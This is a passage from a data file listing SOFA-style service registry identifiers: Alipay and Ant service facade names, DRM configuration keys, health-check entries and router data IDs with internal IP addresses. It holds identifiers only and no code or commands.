MATCH_QUEUE_REBUILD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundcardprod.common.service.prepay.facade.consumerecord.api.ConsumeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:unitradeprod_gzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.property.screen.MobileScreenRepairFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.adjustPackageFeeGaapAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.capacitystudio.facade.CapacityPortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationTargetPropertyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantContactFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.integration.mdistinguish.MerchantRedImageServiceFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskModelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.miniplan.MiniPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftbaascore.api.facade.SpaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.task.TaskExecuteCBFacade:1.0:mwealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.buffettConfig.BuffettPlatformManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.campaign.CampaignQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openctrl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.AnnouncementRemindFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@isasp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.psbp.common.service.ins.InsCardBindManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbpromocore.common.service.facade.CampTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.complain.service.facade.ReportRuntimeOpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:testproject01@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agap.service.facade.mng.api.CsInstanceMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_WQ_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.financeprod.account.facade.api.ContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.125.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.outbound.facade.OutboundStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadaq.common.service.facade.DqcRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:baoxianprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@filebridge#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.lifeprod.common.service.client.ComponentFunctionInvokeManager:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmarket.rec.service.PcreditCommonRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.d11333aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cifcommon.business.platform.useragreement.drm.UserAgreementClientSwitch.hisQueryRpcSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyorg.common.service.facade.handler.ApplyCallbackHandler:1.0:deliveryAuditCallbackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.loadtest.CustomizationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.manager.AuthManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alifi.applycenter.services.apply.ApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.activity.ActivityPartnerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acnotifycore.common.service.facade.SPIExtensionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.recommend.LifeReportCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.234.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.event.sync.convert.service.AntEventSyncConvertMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileapp.common.service.facade.switches.ClientSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardPayeePartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.data.AutoCicadaDataFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:amlmatrix_ruleOnlineCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.appointment.api.AppointmentConfQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","xxx.cn.com.antcloud.acparamcore.common.service.facade.api.manage.ParamStructureManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcBillQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.capacity.ActivityCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insiopbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.monitorSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.deposit.api.AdvanceDepositSettleAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.d11961aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ProductPoolMerchantsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisInfoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.grmcore.common.service.facade.roi.GrmRoiAssessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.UserModelQueryFacadeForClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.QuotationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.clear.common.service.facade.OperateFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdataprod.common.service.facade.mds.MdsConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codemarket.minipcodemarket.facade.codemarket.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanapply.common.service.spi.LoanCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:tr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:sesameCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:monalisabff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfoprod.common.service.cds.facade.MetaProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdesk.common.service.facade.api.KbDeskAreaOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.facade.ExportConfigMngFacade:1.0:lifeexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.solution.ProductSolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.merchant.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sccounter.facade.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fporgassetswap.common.service.facade.api.DrmMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SECUINFOS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.lmyh.LmyhInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","fpdecisionplatform@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.unibase.common.service.facade.api.unimeta.UniMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.BPInstanceFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.146.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.facade.property.PropertyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.HistoricalAccountingReceiptProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifemsgprodTemplateProcess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.156.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:resmng-instAccountPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.mtconfig.service.CrowdSyncConfigService:1.0:crowdSyncConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifygw.facade.service.UnifygwCustomFacade:1.0:security@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.CertifyRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecommunity.common.service.facade.FeedCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdda.facade.dasaa.DasaaAdalaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.smart.SceneTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.TemplateLibManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.TwoPhaseVoucherManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtbank.facade.api.BankInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodecSitecodeResultMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.query.PaymentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:dsrconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.test.demo.SampleService:1.0:DirectUrlTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FINDEFENCECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.role.EcologicalPartnerRoleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifiedlimit.facade.UnifiedLimitCheckFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.autooperate.MerchantSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.core.service.custom.teamdivide.AccountRecordRemoteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imobilewallet.common.facade.sso.AlipayHKSingleSignOnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.TlouBizInfoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.featureDiscoverSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.27.231.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.partner.PartnerAppRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.30.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:orderlink-common-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icif.service.facade.api.GlobalRouteQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.89.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.facade.FinfoServiceAppUseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finfodecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.query.SchedulerQueryFacade:1.0:ZAXHBXCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.187.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.assistant.MiniAppRoleOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.FundPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.domain.Voucher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.attribute.facade.AttributeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.BusinessSceneService:1.0:businessSceneService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.37.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcgotonemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.antg.facade.digitalid.DigitalIdentityCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbcateringorder.common.service.facade.api.order.CateringOrderNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.recommend.StockRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.38.61.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocontent.common.service.facade.api.hzf.HzfContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseDeployConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinpromo.common.service.facade.api.moneybox.MoneyBoxOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.SuspendInstructionConfigDRM.cnlPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imaspmng.common.service.facade.OpsWorkOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.trsbrain.common.service.facade.service.GraphDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.peerpayprod.senior.common.service.facade.family.api.FamilyUnregisteredMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.integration.promokernel.PrizeQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:charityprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthGiftStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.reindeer.GoodsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fraudmng.common.service.facade.domain.BusinessDomainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.dmp.DmpCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.AcpProjectBugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.UnionCardInstallmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.CreativeStyleTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitydatastudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.muac.api.facade.code.MuacCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.issueEndDateWhiteFundCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.antha.AnthaCompatibilityIssueDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.activity.api.SpringFestivalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mobileanti#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bluearmyprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.create.IsvMiniAppCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.report.service.facade.api.ReportHealthCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.secucns.api.WeixinApiService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantInfoQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.239.236.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acmarketingcore.common.service.facade.rule.open.RuleManageOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antscheduler.facade.IOpsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:tbasemanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.coffeepayweb:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.biz.trade.service.FintradeRedeemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:dcrgOnchainSubmitExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_DCHAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeSettingInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.ParkingPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.biz.shared.privateapi.ZappinfoPrivateAPI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.144.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_AGDSMMGALIPAY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.adaptor.IspManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.UnifiedMsgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.ratio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.core.service.yeb.repository.YebTradeOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.portrait.UserWantedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmAppScriptorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.servicelibrary.ServicePortalDataQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.insttradev1_ds.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.core.dal.service.BizAttrDALService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.wishAccountingMsgFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.53.107.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.biz.shared.mybank.service.MybkOpenAndBindService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.industry.GenericIndustryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.routeclient.DefaultRouteCoordinator.decisionRuleSwitchEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloantrade.common.service.facade.loan.api.AntTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbitemprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.ProductTypeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ha.service.snb.mng.service.facade.TestServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.SecurityScanResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:opfactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpchangeguardian.common.facade.rule.WhiteListApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:jvcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.channelCode,version=3.0@DRM#@#DEFAULT_INSTANCE